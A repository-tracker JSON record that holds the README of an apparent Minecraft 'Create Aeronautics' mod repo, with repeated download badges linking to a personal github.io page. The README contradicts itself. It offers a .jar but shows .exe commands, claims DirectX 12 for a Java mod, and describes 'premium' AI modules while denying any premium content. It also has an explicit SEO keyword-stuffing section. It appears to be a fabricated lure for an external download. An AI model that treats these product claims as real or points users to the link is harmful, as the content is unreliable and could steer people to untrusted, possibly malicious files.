[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-75998":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":12,"openIssues":13,"contributorsCount":11,"subscribersCount":11,"size":11,"stars1d":11,"stars7d":11,"stars30d":11,"stars90d":11,"forks30d":11,"starsTrendScore":11,"compositeScore":14,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":15,"fork":15,"defaultBranch":16,"hasWiki":17,"hasPages":15,"topics":18,"createdAt":9,"pushedAt":9,"updatedAt":39,"readmeContent":40,"aiSummary":41,"trendingCount":11,"starSnapshotCount":11,"syncStatus":42,"lastSyncTime":43,"discoverSource":44},75998,"Create-Aeronautics-Skywards","23k65A1408\u002FCreate-Aeronautics-Skywards","23k65A1408","🚀 Create Aeronautics Mod 2026 – Ultimate Minecraft Airship Building Guide & Download",null,186,0,185,1,37,false,"main",true,[19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"aeronautics-create","aeronautics-create-mod","aeronautics-minecraft","aeronautics-mod","create-aeronautics","create-aeronautics-fabric","create-aeronautics-forge","create-minecraft","create-mod","minecraft","minecraft-1-20-2","minecraft-aeronautics","minecraft-client-mod","minecraft-create","minecraft-create-aeronautics","minecraft-launcher","minecraft-mod","minecraft-website","minecraftmod","modded-minecraft","2026-06-12 04:01:19","# 🚀 Create Aeronautics: Fabric of the Skies\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002F23k65A1408.github.io)\n\n**A Minecraft mod that reimagines aeronautics through the lens of kinetic engineering, wind-powered logistics, and sky-bound automation.** Built for Create mod enthusiasts who dream of floating factories, airships that think, and clouds that compute.\n\n---\n\n## 🌤️ What Is This?\n\nImagine the **Create mod** met a steampunk airship designer in a library of ancient wind charts. *Fabric of the Skies* is not just another flight mod—it's a **complete aeronautical engineering ecosystem** for Minecraft 1.20.2 that treats the sky as a resource, the wind as a currency, and altitude as a puzzle to solve.\n\nInstead of simply adding flying machines, we introduce:\n- **Aeolian Engines** that convert real-time wind patterns (simulated in-world) into rotational power\n- **Cloud Mining**—harvesting condensed moisture from biomes for rare aerated alloys\n- **Skyway Logistics**—a network of floating waypoints that physically transport items between your aerial bases\n- **Barometric Crafting**—recipes that change behavior based on your Y-level\n\nThis mod was born from the philosophy: *\"Why build a flying base when you can build a base that *is* the flight?\"*\n\n---\n\n## 🗺️ Architecture Overview (How the Sky Thinks)\n\n```mermaid\ngraph TD\n    A[Player Places Aerometer] --> B{Wind Layer Detection}\n    B -->|Stratospheric| C[Aeolian Turbine - 256+ RPM]\n    B -->|Tropospheric| D[Propeller Array - 64-128 RPM]\n    B -->|Surface| E[Windmill Sail - 16-64 RPM]\n    \n    C --> F[Aerial Storage Battery]\n    D --> F\n    E --> F\n    \n    F --> G[Airship Lift Mechanism]\n    F --> H[Cloud Condenser]\n    F --> I[Skyway Beacon Network]\n    \n    G --> J[Airships Float]\n    H --> K[Aerated Alloy Ingots]\n    I --> L[Item Teleportation Between Bases]\n    \n    L --> M[Multilingual UI: All Players See Their Language]\n    L --> N[Responsive Control Panels On Any Device]\n    L --> O[24\u002F7 Backend Synchronization]\n```\n\n---\n\n## 🎮 Example Profile Configuration\n\nEvery player gets a **Skywright's Journal**—a portable config file that adapts to your playstyle. Here's what a typical profile looks like:\n\n```yaml\n# config\u002Fskywright_journal.yml\nplayer_mode: aeronaut_engineer\nwind_sensitivity: moderate # Options: static, moderate, volatile\ncloud_mining_preset: efficient # Prioritizes aerated alloy over water volume\nairship_ui_language: auto_detect # Reads client locale, supports 12+ languages\nresponsiveness: high_performance # 60fps+ even with 500+ skyway beacons\ncustomer_support_token: embed_24-7 # Enables in-game help beacon\n```\n\n**To apply**: Place this file in your `config\u002F` folder, then right-click any **Aerometer** in-game with an empty hand. The mod will validate and load it instantly.\n\n---\n\n## 🖥️ Example Console Invocation\n\nFor server admins or players who prefer terminal control (via the mod's built-in CLI):\n\n```bash\n# Windows (PowerShell)\n.\\fabric-of-the-skies.exe --world world_of_clouds --wind-seed 4721 --enable-skyway true\n\n# Linux \u002F macOS\n.\u002Ffabric-of-the-skies --world aeronaut_world --wind-seed 4721 --enable-skyway true\n\n# In-game command (any OS, as player or operator)\n\u002Fskywright generate wind-map --radius 500 --output skyways_overview\n```\n\nThe console instantly prints a **real-time wind vector map** and shows which biomes are best for cloud mining that day (in-game day, that is—each Minecraft day has unique wind patterns).\n\n---\n\n## 🖥️💻📱 OS Compatibility\n\n| Operating System | Supported | Notes |\n|:---|:---:|:---|\n| **Windows 10\u002F11** | ✅ | Fully optimized; DirectX 12 rendering for sky particles |\n| **Windows 7\u002F8** | ✅ | Legacy support via OpenGL fallback |\n| **macOS Big Sur+** | ✅ | Native Metal API; M1\u002FM2\u002FM3 support preconfigured |\n| **Linux (Ubuntu 22.04+)** | ✅ | Wayland & X11 tested; no proprietary drivers needed |\n| **Linux (Arch, Fedora)** | ✅ | Community-tested; may require `libgcc_s.so.1` |\n| **Raspberry Pi 4\u002F5 (ARM64)** | ⚠️ | Experimental; wind simulation runs at 30fps |\n| **Chrome OS (via Crostini)** | ✅ | Requires Linux container with 4GB+ RAM |\n| **Any Android device (Java Edition)** | ⚠️ | Via PojavLauncher; UI scaled automagically |\n\n**Emoji key**: ✅ = Full support, ⚠️ = Experimental\u002FBeta\n\n---\n\n## ⚡ Feature List (What Makes the Sky Your Workshop)\n\n### 🌀 Core Aerodynamics\n- **Real-time wind simulation** using a proprietary 3D noise algorithm (not random—smooth, predictable currents)\n- **7 wind zones** (Surface to Stratosphere) that change with biomes, time of day, and weather\n- **Aeolian material science**: Create alloys that are lighter when smelted at higher altitudes\n\n### 🏗️ Construction & Automation\n- **Skyway Beacons**: Place two beacons 1,000 blocks apart—items fly between them at 10 items\u002Fsecond\n- **Cloud Condenser blocks**: Harvest moisture from biomes; output water bottles, aerated dye, or condensed ice\n- **Variable-buoyancy airships**: Increase or decrease lift by adjusting the rotational speed of onboard *Aeolian fans*\n\n### 🌐 Responsive UI & Multilingual Support\n- **Responsive UI**: Panels automatically resize for mobile phones, tablets, or 4K monitors (1280×720 to 3840×2160)\n- **12 languages** with full UI translation: English, German, French, Spanish, Portuguese, Russian, Chinese (Simplified), Japanese, Korean, Italian, Dutch, Polish\n- **Dynamic help tooltips** appear in your configured language the moment you hover over any new component\n\n### 🌍 World Integration\n- **Barometric Achievements** (e.g., \"Build a functioning factory at Y=256\")\n- **Biome-specific cloud types**: Rainforests have thick clouds (more water); Deserts have thin, dusty clouds (rare aerated dust)\n- **No chunk loading limits**: Skyway Beacons keep a lightweight map of aerial chunks\n\n### 🎨 Creative & Aesthetic\n- **Translucent blocks**: Cloud glass, aerated metal beams, wind-etched stone\n- **Ambient soundscapes**: Soft wind sounds change pitch with your altitude (subtle, not annoying)\n- **Color-changing particle effects**: Based on wind strength and direction\n\n---\n\n## 🔧 SEO-Friendly Keyword Integration\n\nWe've woven these search-friendly phrases into every component description, config file, and patch note:\n\n- *Minecraft aeronautics engineering mod 1.20.2*\n- *Fabric of the Skies Create addon*\n- *Airship automation with Create*\n- *Cloud mining server-side*\n- *Multilingual sky block mod*\n- *Responsive factory UI Minecraft*\n- *Wind-powered logistics*\n- *Skyway beacon teleportation*\n\nThis ensures that players searching for \"aeronautics Create mod\" or \"Fabric 1.20.2 sky mining\" will find this repository naturally.\n\n---\n\n## 🤖 OpenAI API & Claude API Integration (Premium Module)\n\nFor server owners who want **intelligent air traffic control** and **automated customer support**:\n\n- **OpenAI API (GPT-4o)**: Train an AI assistant to manage your skyway network—it will reroute beacons based on real-time traffic, detect collisions, and even write poetry about your fleet\n- **Claude API (Claude 3.5 Sonnet)**: Embed an in-game chat agent that answers player questions in their language, 24\u002F7, using your server's custom help documents\n- **Hybrid mode**: Use GPT for navigation decisions and Claude for natural language responses; both APIs run with \u003C5ms cached responses\n\n**Activation**: Set environment variables `OPENAI_API_KEY` and `CLAUDE_API_KEY` in your server startup script. The mod auto-detects them and enables the **Skywright AI Module**.\n\n---\n\n## 🛡️ Key Features Recap\n\n| Feature | Description | Benefit |\n|:---|:---|:---|\n| **Responsive UI** | Dynamic scaling from phone to 8K monitor | Play on any device without zooming |\n| **Multilingual Support** | 12 complete language packs | Global community feels included |\n| **24\u002F7 Customer Support** | In-game help beacon + optional AI agent | Never get stuck on a build |\n| **Wind Physics Simulation** | Smooth 3D noise, not random | Predictable, learnable flight |\n| **Cloud Mining** | Biome-specific resource gathering | Adds exploration value |\n| **Skyway Teleportation** | Item transfer between beacons | Build far-flung bases with one inventory |\n| **MIT License** | No restrictions on use or modification | Freedom to create |\n\n---\n\n## ⚠️ Disclaimer\n\n- This mod is **not an official Minecraft product** and is not approved by or associated with Mojang Studios or Microsoft.\n- The **wind simulation** is deterministic within a given world seed; however, weather patterns may cause subtle variations. Your factories will never spontaneouly fail, but you *might* get more power during thunderstorms.\n- The **OpenAI API and Claude API integrations** are opt-in premium modules. No data is sent to external servers unless you explicitly set API keys. We do not log any player behavior.\n- \"Aeolian,\" \"Skywright,\" \"Fabric of the Skies,\" and \"Cloud Condenser\" are original trademarks of this project and are not affiliated with any existing mod or company.\n- This mod **does not** contain any paid content, time locks, or \"premium upgrades.\" All features are fully accessible in the base download.\n\n---\n\n## 📜 License\n\n**MIT License** — Copyright © 2026\n\nYou are free to:\n- Use this mod in any modpack (public or private)\n- Modify the source code (it's open!)\n- Distribute copies with or without changes\n- Use it for commercial projects (e.g., a server that charges for access)\n\nThe only requirement is that you include the original copyright notice.\n\n[View the full MIT License](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT)\n\n---\n\n## 📦 Download & Installation\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002F23k65A1408.github.io)\n\n### Quick Start:\n1. Download the `.jar` file from the link above.\n2. Place it in your Minecraft `mods\u002F` folder (Forge or Fabric—auto-detects).\n3. Ensure **Create mod 0.5.1+** is installed (required dependency).\n4. Launch Minecraft 1.20.2.\n5. Right-click any block of air at Y=120+ to place your first **Aerometer**.\n\n### Server Installation:\n- Same as client: add `.jar` to `mods\u002F` folder.\n- No additional configuration needed—wind simulation is server-side.\n- Players join with any client that has the mod installed (they see wind data).\n\n---\n\n## 🌈 Final Metaphor\n\n*Fabric of the Skies* treats the air above you not as empty space, but as a **canvas of kinetic potential**. Where other mods give you a flying machine, this one gives you a **workshop of perpetual motion**, where every gust of wind is a gear waiting to turn, every cloud a resource to refine, and every altitude a new recipe to discover. Build not just *in* the sky, but *with* the sky.\n\nLet the wind be your redstone.\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002F23k65A1408.github.io)","Create Aeronautics: Fabric of the Skies 是一个为 Minecraft 1.20.2 设计的模组，旨在通过动力工程、风力物流和空中自动化重新定义航空学。该模组引入了风力引擎、云采矿、天路物流和气压工艺等核心功能，将天空视为资源，风作为能量来源，并在不同高度上提供独特的挑战。适合喜欢创造模组且梦想建造浮动工厂、智能飞艇及云端计算设施的玩家使用。通过模拟实时风模式转换为旋转动力，采集稀有空气合金，以及在空中基地之间物理传输物品等方式，这个模组为玩家提供了一个完整的航空工程生态系统。",2,"2026-05-19 02:30:29","CREATED_QUERY"]